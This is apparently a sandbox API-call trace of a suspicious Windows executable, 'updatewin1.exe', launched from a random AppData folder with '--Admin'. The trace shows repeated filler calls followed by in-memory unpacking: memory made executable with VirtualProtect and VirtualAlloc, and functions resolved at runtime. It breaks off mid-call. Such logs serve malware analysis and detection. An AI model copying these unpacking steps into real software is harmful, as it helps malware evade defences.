[0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.791] GetACP () returned 0x4e4 [0091.791] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.792] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.792] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.793] GetACP () returned 0x4e4 [0091.793] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.794] GetACP () returned 0x4e4 [0091.794] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.795] GetACP () returned 0x4e4 [0091.795] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.796] GetACP () returned 0x4e4 [0091.796] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.797] GetACP () returned 0x4e4 [0091.797] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.798] GetACP () returned 0x4e4 [0091.798] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.798] GetACP () returned 0x4e4 [0091.798] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.798] GetACP () returned 0x4e4 [0091.798] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.798] GetACP () returned 0x4e4 [0091.798] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.798] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.837] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.837] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.838] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.838] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.839] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.839] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0091.840] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.840] GetACP () returned 0x4e4 [0092.389] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76e10000 [0092.389] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0092.389] VirtualProtect (in: lpAddress=0x581698, dwSize=0x56041, flNewProtect=0x40, lpflOldProtect=0x18f714 | out: lpflOldProtect=0x18f714*=0x4) returned 1 [0092.398] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0092.398] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0092.399] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0092.399] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0092.399] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0092.399] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0092.399] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0092.400] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0092.400] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0092.403] Module32First (hSnapshot=0x58, lpme=0x18f4dc) returned 1 [0092.405] VirtualAlloc (lpAddress=0x0, dwSize=0x89450, flAllocationType=0x1000, flProtect=0x40) returned 0x2f0000 [0092.422] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0092.422] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0092.422] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0092.422] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0092.422] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0092.935] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0092.936] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0092.936] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0092.936] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0092.936] SetErrorMode (uMode=0x400) returned 0x0 [0092.936] SetErrorMode (uMode=0x0) returned 0x400 [0092.936] GetVersionExA (in: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x6, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.936] VirtualAlloc (lpAddress=0x0, dwSize=0x88600, flAllocationType=0x1000, flProtect=0x4) returned 0x4a0000 [0092.950] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8d000, flNewProtect=0x40, lpflOldProtect=0x18f494 | out: lpflOldProtect=0x18f494*=0x2) returned 1 Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" page_root = "0x32538000" os_pid = "0x868" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x758" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0x880 [0082.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9d7a1a20, dwHighDateTime=0x1d5d6b4)) [0082.881] GetCurrentProcessId () returned 0x868 [0082.881] GetCurrentThreadId () returned 0x880 [0082.881] GetTickCount () returned 0x115a7f3 [0082.881] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22332284863) returned 1 [0082.890] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0082.890] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f80000 [0082.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0082.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.892] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.894] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0082.894] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x214) returned 0x1f807d0 [0082.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.894] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0082.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0082.895] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0082.895] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0082.895] GetCurrentThreadId () returned 0x880 [0082.895] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0082.895] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x800) returned 0x1f809f0 [0082.895] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0082.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0082.895] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0082.895] SetHandleCount (uNumber=0x20) returned 0x20 [0082.895] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin" [0082.895] GetEnvironmentStringsW () returned 0x5c4e78* [0082.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0082.896] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x565) returned 0x1f811f8 [0082.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1f811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0082.896] FreeEnvironmentStringsW (penv=0x5c4e78) returned 1 [0082.896] GetLastError () returned 0x0 [0082.896] SetLastError (dwErrCode=0x0) [0082.896] GetLastError () returned 0x0 [0082.896] SetLastError (dwErrCode=0x0) [0082.896] GetLastError () returned 0x0 [0082.896] SetLastError (dwErrCode=0x0) [0082.896] GetACP () returned 0x4e4 [0082.896] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x220) returned 0x1f81768 [0082.896] GetLastError () returned 0x0 [0082.896] SetLastError (dwErrCode=0x0) [0082.896] IsValidCodePage (CodePage=0x4e4) returned 1 [0082.896] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0082.896] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.897] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0082.897] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.897] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, 